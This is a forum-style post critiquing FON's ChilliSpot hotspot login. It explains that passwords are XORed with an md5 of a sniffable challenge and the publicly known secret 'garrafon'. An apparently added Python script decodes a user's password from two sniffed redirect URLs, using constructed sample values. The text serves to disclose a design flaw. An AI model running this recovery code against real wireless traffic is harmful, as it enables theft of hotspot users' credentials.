Let me tell you a bit about ChilliSpot (the auth software of FON) and how it works:

1. The user tries to connect to a page, chilli sends back a redirect => the user is redirected to the FON login page (with some GET variables).

2. The user logs in (sending user/pass and the GET variables to the FON server).

3. Here's the basic code which the FON server executes now:

[code]
<?php
// Challenge from chilli: 32 hex chars in the URL -> 16 raw bytes
$hex_chal = pack('H32', $_GET['chal']);
// The "key": md5 of the raw challenge plus the shared uamsecret, as 16 raw bytes
$newchal = pack('H*', md5($hex_chal . "garrafon"));
// NUL-pad the password to 32 bytes; PHP's string XOR below truncates to the 16-byte key
$newpwd = pack('a32', $_POST['password']);
// Encoded password = password XOR key, sent on as hex
$password = implode('', unpack('H32', ($newpwd ^ $newchal)));
$query = '?username=' . $_POST['user'] . '&password=' . $password . '&userurl=' . urlencode($_GET['userurl']);
// Redirect the browser back to the user's own chilli (the AP), which decodes it
header('Location: http://192.168.182.1:3990/logon' . $query);
[/code]

$_GET['chal'] is set by ChilliSpot, it's a random 32 byte string. It's put together with the uamsecret "garrafon" (which you can compare with an en/decryption key). Normally only the web server and ChilliSpot should know it; it's used to generate the random md5 string (the key). You can forget about security at this point already, because everybody knows the uamsecret and can get the key by sniffing the chal var from the WLAN traffic. Now they just need to sniff the following redirect (with the "encrypted" password)... That's the way everybody who's able to sniff WLAN can get your password ;) and additionally you can see where the FON page will redirect you to: your local ChilliSpot server...

4. Your AP's ChilliSpot got the user name and the encoded password.

5. ChilliSpot decodes the password.

6. ChilliSpot will try to auth the user against the local users (aka friends & family users). Why do you think it takes up to an hour or a reboot of the router to get them working? Why doesn't F&F work with other firmwares? Yes, because they are stored locally and updated via the heartbeat script (aka remote control script ;)).

7. If no local user matched, the password is encoded again (with the shared key, "garrafon" too...) and sent to the FON radius servers.

8. Depending on the radius reply ChilliSpot will redirect you to the auth successful/failed page.

That's the way it works, a real nightmare for everybody who cares about security ;) and you see SSL would only prevent you from sending plain passwords. Hackers have to sniff two connections and not only one, additionally they have to run 5 more lines of code to decode your password! Just have a look where the FON auth page redirects you to ;) The only way to increase security is to run your own radius server with an own uamsecret which will send auth requests to the FON servers with the public uamsecret via a secure line. But this is still far from secure...
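The exchange described in the post above, as an added example that is not part of the original post or of any ChilliSpot or FON code: it reproduces the PHP encoding step in Python, then plays the eavesdropper who has sniffed both redirects (chilli -> FON page with the chal, FON page -> chilli with the encoded password) and knows the public uamsecret "garrafon". The challenge value, user name, password and the FON login host name are constructed for the example; the 192.168.182.1:3990 address is the one from the PHP above.

```python
import hashlib
from urllib.parse import urlparse, parse_qs, quote

# The shared secret the post says every FON hotspot page uses (from the PHP above).
UAMSECRET = b"garrafon"


def chilli_key(chal_hex: str, uamsecret: bytes = UAMSECRET) -> bytes:
    """The PHP $newchal: md5(raw challenge bytes . uamsecret), as 16 raw bytes.

    pack('H32', $chal) turns the 32 hex chars from the URL into 16 raw bytes;
    pack('H*', md5(...)) turns the md5 hex digest back into 16 raw bytes.
    """
    return hashlib.md5(bytes.fromhex(chal_hex) + uamsecret).digest()


def encode_password(password: str, chal_hex: str, uamsecret: bytes = UAMSECRET) -> str:
    """What the FON login page computes before redirecting back to chilli.

    pack('a32', $password) NUL-pads to 32 bytes; PHP's string XOR then truncates
    to the shorter operand, so only the first 16 bytes of the password survive.
    """
    key = chilli_key(chal_hex, uamsecret)
    padded = password.encode("utf-8")[:32].ljust(32, b"\0")
    xored = bytes(p ^ k for p, k in zip(padded, key))   # zip stops at the 16-byte key
    return xored.hex()                                  # unpack('H32', ...)


def decode_password(encoded_hex: str, chal_hex: str, uamsecret: bytes = UAMSECRET) -> str:
    """The inverse step: what the AP's chilli does, and what anyone holding the chal can do."""
    key = chilli_key(chal_hex, uamsecret)
    raw = bytes(c ^ k for c, k in zip(bytes.fromhex(encoded_hex), key))
    return raw.rstrip(b"\0").decode("utf-8", errors="replace")


def recover_from_sniffed(first_redirect: str, second_redirect: str,
                         uamsecret: bytes = UAMSECRET) -> tuple[str, str]:
    """Eavesdropper's view: chal from the chilli->FON redirect, password from the FON->chilli one."""
    chal = parse_qs(urlparse(first_redirect).query)["chal"][0]
    logon = parse_qs(urlparse(second_redirect).query)
    return logon["username"][0], decode_password(logon["password"][0], chal, uamsecret)


# Constructed sample exchange, not a real capture. The FON login host name is made up.
SAMPLE_CHAL = "0123456789abcdef0123456789abcdef"
SAMPLE_USER = "alice@example.org"
SAMPLE_PASSWORD = "hunter2"


def sample_exchange() -> tuple[str, str]:
    """Build the two Location: headers as they would cross the WLAN (constructed)."""
    userurl = quote("http://example.com/", safe="")
    first = ("http://login.fon.example/login?res=notyet&uamip=192.168.182.1&uamport=3990"
             f"&chal={SAMPLE_CHAL}&userurl={userurl}")
    second = (f"http://192.168.182.1:3990/logon?username={quote(SAMPLE_USER)}"
              f"&password={encode_password(SAMPLE_PASSWORD, SAMPLE_CHAL)}"
              f"&userurl={userurl}")
    return first, second


if __name__ == "__main__":
    first, second = sample_exchange()
    print("sniffed:", first)
    print("sniffed:", second)
    print("recovered:", recover_from_sniffed(first, second))
```

Running the file prints the two redirects and the recovered user name and password. decode_password is the same operation the AP's chilli performs, which is the post's point: once the uamsecret is public, the XOR with md5(chal + uamsecret) is no protection at all, and the only thing an eavesdropper gains from SSL on the login page is having to watch the second redirect instead of the form POST. The example also shows a side effect of the PHP, that anything past the 16th byte of the password is silently dropped.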